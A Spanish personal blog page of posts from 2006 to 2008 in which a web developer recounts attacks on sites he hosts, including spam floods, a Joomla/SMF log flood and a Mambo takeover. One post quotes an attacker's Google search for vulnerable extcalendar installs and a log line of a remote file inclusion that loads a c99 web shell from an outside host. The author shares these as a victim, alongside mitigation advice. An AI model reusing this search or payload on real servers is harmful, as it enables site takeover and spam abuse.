Programador analista de sistemas web: Hacking

Ataques de spammers

Mon, 02 Jun 2008 12:25:50 GMT

Ataques de spammers intentan colapsar los servidores donde alojo páginas web,no se cansan esta gente...

Ataque a la web del grupo de reggae Soldiers

Sun, 01 Jun 2008 22:06:59 GMT

Un nuevo intento de pirateo de un servidor...

El fallo usado esta vez para tumbar el servidor fue una excesiva generación de errores en el foro "SMF" vinculado a Joomla (otra vez tu!), que hacia que los logs que se almacenan en la tabla asociada de este foro aumentara mucho...hasta alcanzar el límite establecido...además, la CPU se sobrecargaba por tener tantos eventos de error a guardar...es decir, ...ataques de distintos orígenes que llegaban a llenar casi 300MB de datos en pocas horas ,satura el motor MySQL hasta hacer caer el servidor...

Asi que ya sabeis , no actives la opción de guardar logs en MySQL,...no guardaría ni las sesiones, ya que el límite de espacio de los servidores de bases de datos suelen ser inferiores a los de espacio por quota de ficheros...

Saludos!

Hackers rusos se lo pasan en grande

Mon, 30 Apr 2007 17:58:59 GMT

Mi socio mientras buscaba en google cosas, encontró que unos hackers rusos estaban de vacaciones por las webs españolas, eso si, dejando su "marca"...

y que conste q no me alegro de q le vaya mal a la competencia!.

firewalking y empresayweb

a seguir pillandolos!!

Problemas de seguridad en www.soldiers-reggaeband.com

Sun, 15 Apr 2007 21:55:50 GMT

De nuevo he sido víctima de un problema de seguridad de un componente de Joomla, en esta ocasión ha sido un componente de calendarios, "extcalendar", el hacker en cuestión, parece ser checo ,vino buscando el componente por google
http://www.google.it/search?q=+%22inurl:index+php+option+com_extcalendar%22&num=100&hl=it&lr=&as_qdr=all&start=100&sa=N
encontrando la web donde estaba, a partir de ahi usa 1 programa en php q intenta usar la SHELL (consola de linux), por suerte la seguridad del servidor no permite ejecutar scripts con la instruccion exec() y no llegó demasiado lejos...
62.168.125.217 - - [10/Apr/2007:20:08:21 +0200] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://crashz.by.ru/shell/c99.txt?cmd HTTP/1.0" 200 33872 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
ésa es la web de exploits ,evidentemente el hacker está usando un proxy-server...

Intentando varios scripts a lo largo de la tarde desde otras direcciones

http://www.a77web.it/aggiornamenti/a.txt?
llegó a conseguir enviar correos de spam, desde aquí me gustaría hacer la petición de ayuda para recuperar puestos en los servidores antispam, es decir, dejar de estar marcado como servidor de correo basura, si alguien lo sabe, le agradecería mucho sus conocimientos :)...

Y al final va a ser verdad que la seguridad no existe... www.soldiers-reggaeband.com

Por cierto, el tema fue tratado por la policía y se consiguió parar al hacker tan pronto como se detectó...
Tomad nota, quitar la libreria de mail del componente de Joomla extcalendar en /components/com_extcalendar/lib/mail.inc.php y quitar los permisos de añadir eventos...o mejor ni siquiera instaleis el componente...

Saludos...

Makina de cocacola...bebidas gratis?

Wed, 14 Jun 2006 22:44:25 GMT

He subido un video en youtube: http://www.youtube.com/watch?v=Xzs7dzks3W8 grabado en un sitio conocido :) con una mákina de cocacola,probando lo que se dice en la web de i-hacking.com y parece que funciona,lástima que no haya códigos para reconfigurar la máquina disponibles...

Otra cosa interesante es lo que se ha inventado el hombre de esa web...coge un cable USB y le deja solo la parte de la corriente, para poder escuchar mientras se recarga con el pc enchufado...cuando ,al menos en mi modelo,basta enchufarlo y desde iTunes hacer un "desmontar" y tienes lo mismo pero sin hacerte el cable...a veces se le va la olla XD

Senseidav.com hackeada

Tue, 28 Feb 2006 22:14:29 GMT

La historia empezó cuando quise desarrollar un pequeño juego para www.sms.ac como developer, o sea, desarrollador...claro, necesitabas un sitio donde hospedar el juego que no fuera esa web...y usé el dominio de mi hermano www.senseidav.com ...la cosa es que no sabia si realmente estaba triunfando una vez hice la primera versión...,tampoco me importaba demasiado. Además había que pagar una cuota al mes para que el plugin funcionara dentro de la web de mensajería...

Cierto día dejó de funcionar la web de arte, no me di cuenta de ello pero mi hermano si, que me avisó...total, que me pongo a revisar la configuración y parece ser que algún graciosillo había borrado las plantillas de la web, la web ,usaba el gestor de contenido Mambo.

Después de mucho cavilar me doy cuenta de que ésta versión del famoso CMS (gestor de contenidos) tiene un agujero de seguridad con el que puedes sobreescribir la configuración y entrar como administrador!, vaya tela...

El caso es que, viendo los logs de acceso al servidor senseidav,justo después de usar el juego de sms.ac el hacker se pone a jugar con la web y al final se la carga...la información que me devuelve un whois de la IP del atacante dice provenir de Amsterdam...estaría fumado?

Al final hemos decidido borrar el gestor de contenidos y hacer el código a mano. :) seguro que así no hay ningún problema, de hecho nunca lo he tenido cuando he escrito mi propio código y así es como debe seguir!